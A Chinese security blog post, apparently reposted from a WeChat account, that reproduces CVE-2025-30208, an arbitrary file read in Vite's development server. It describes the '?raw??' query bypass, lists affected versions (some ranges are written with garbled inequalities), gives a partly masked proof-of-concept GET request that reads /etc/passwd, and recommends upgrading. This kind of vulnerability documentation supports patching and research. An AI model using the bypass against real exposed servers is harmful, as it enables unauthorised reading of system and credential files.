night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞描述
Vite 是一家前端开发工具提供商,在 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 之前的版本中存在漏洞。'@fs' 拒绝访问 Vite 提供允许列表之外的文件。添加 '?raw??' 或 '?import&raw??' 重定向到 URL 会绕过此限制并返回文件内容(如果存在)。之所以存在此绕过,是因为在多个位置删除了诸如 '?' 之类的尾随分隔符,但未在查询字符串正则表达式中考虑。可以将任意文件的内容返回到浏览器。只有明确将 Vite 开发服务器暴露到网络的应用程序(使用 '--host' 或 'server.host' 配置选项)才会受到影响。版本 6.2.3、6.1.2、6.0.12、5.4.15 和 4.5.10 修复了此问题。
影响版本
Vite <=4.5.9
5.0.0 >= Vite <=5.4.14
6.0.0 >= Vite <=6.0.11
6.1.0 >= Vite <=6.1.1
6.2.0 >= Vite <=6.2.2
漏洞复现
GET /xxx/etc/passwdxxx HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c2d)XWEB/13487
Content-Type: application/json
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=1, i
Connection: keep-alive
修复建议
官方已推送更新版本,受影响用户可以升级至安全版本:
6.2.3、6.1.2、6.0.12、5.4.15、4.5.10
原文始发于微信公众号(night安全):【漏洞复现】Vite存在任意文件读取漏洞 CVE-2025-30208
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论